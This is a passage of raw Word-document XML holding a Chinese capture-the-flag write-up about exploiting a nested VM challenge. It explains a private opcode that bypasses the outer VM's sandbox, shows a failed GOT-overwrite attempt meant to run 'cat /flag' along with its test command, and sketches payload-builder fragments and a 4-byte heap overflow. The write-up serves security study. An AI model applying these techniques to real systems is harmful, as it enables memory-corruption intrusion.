      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">findings.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">给出的核心判定，外围的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并非仅仅是一个受制于严格沙箱边界的常规解释器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">该虚拟机实现了一组形似</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RISC-V </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的指令集架构：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0x03</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> load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0x13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I-type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">格式算术指令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0x23</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应常规的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> store </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">写入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0x37</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lui </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令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0x63</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应分支跳转</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> branch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0x6f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应无条件跳转</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">然而，攻破防御体系的枢纽在于一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">开发者私有的指令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0x2f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。与普通存取操作截然不同，该指令完全无视了虚拟内存的页表限制，其逻辑为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> rs1 + off </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">计算</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> arena </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内偏移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  <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> arena_base + offset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1/2/4/8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">其引申含义为：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若使用标准的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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令将遭到内存权限拦截；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借助非标准的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x2f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令则能够直接操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> arena </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的内存区块；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恰巧，内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的代码就存储于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> arena </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中偏移量为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x300000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的固定位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">至此，本题的核心绕过策略（bypass）便浮出水面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第二层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">先提交为重复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 13 00 00 00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“合法占位字节流”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  <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">校验通过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  <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">外层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">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0x2f（或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> load/store copy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">loop）把这块区域改写成真正的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用字节码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此环节极为致命，它将题目从“表面上被严苛验证堵死”的假象中剥离出来，转化为“一旦获取到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区块的写入权，便可将内层解释器替换为任意恶意执行流”的实质。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="13" w:name="header-n86"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">试图覆写</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GOT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表的常规方案受挫，但该试错过程意义重大</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在当前的工作路径下，遗留了一版早期的利用脚本与载荷（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit_build.py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exploit_local.bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），其构建意图为：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操控外部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">篡改内存映射或页表项；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free@GOT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表项劫持至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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的入口地址；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随后利用内层的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">free("cat /flag")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虽然该构思逻辑清晰且顺理成章，不过本地测试环节并未得到预期结果：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cd iscc/temp/evm</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run --rm --platform linux/amd64 -v "$PWD:/work" -w /work pwn_ubuntu24 \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  /bin/bash -lc './ld-linux-x86-64.so.2 --library-path . ./pwn &lt; exploit_local.bin; echo EXIT:$?'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">终端输出显示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EXIT:2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上述现象与早期记忆留存的分析结果相符：程序由于触发了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的沙箱权限校验而直接崩溃，这反证了先前所谓“利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> direct store </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">覆写关键页表目录”的猜测无法实现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这次无效尝试揭示了两条宝贵的线索：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证明了“仅靠外围直写覆盖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GOT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表”绝非稳妥的通关路径；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驱使研究视角回归到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本身，重新审视内部虚拟机的堆块操作原语是否具备实施攻击的威力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正是由于该思路的转变，解题重心彻底由“突破外部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限封锁”转移至“借助内层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实现高版本</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> glibc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的堆风水利用”。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="header-n107"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4: BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的真实破绽在于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">edit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附带的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">堆溢出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅仅支持处理如下三种格式的操作记录：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标签</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tag 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应内存分配（alloc）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标签</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tag 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应内存编辑（edit）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标签</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tag 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应环境退出清理（exit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">free_all）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在分析初期，本地的一份名为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">blindvm_parse.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以及对应的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">findings.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文档曾这样描述：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alloc record = [tag][u32 size][size filler]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">随着后续逆向工程的深入，生成脚本</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">build_payload.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将其结构更正为：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rec_alloc(sz, data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struct.pack(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;I'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, sz)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rec_edit(idx, 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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\x01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struct.pack(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;II'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, idx,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rec_exit():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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\x02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由此可知，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">alloc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">操作并不含有任何填充字节，解析器实际提取的数据仅包含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[tag][u32 size]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两部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。这一调整并非凭空捏造，它与目前网络上流传的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞分析文章中的攻击载荷格式完美契合：在那些公开发布的利用脚本中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">add(size)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">也是直接构造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">p8(0)+p32(size)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，绝无冗余数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最致命的代码逻辑潜伏在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">edit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处理流程中：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">copy_len = min(stored_size + 4, 0xfff)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">memcpy(chunk_ptr, user_data, copy_len)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根据该逻辑，攻击者只要掌握了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的体积信息，即可实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">固定向后方越界写入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个字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的覆盖。尽管溢出长度仅有区区</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ptmalloc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
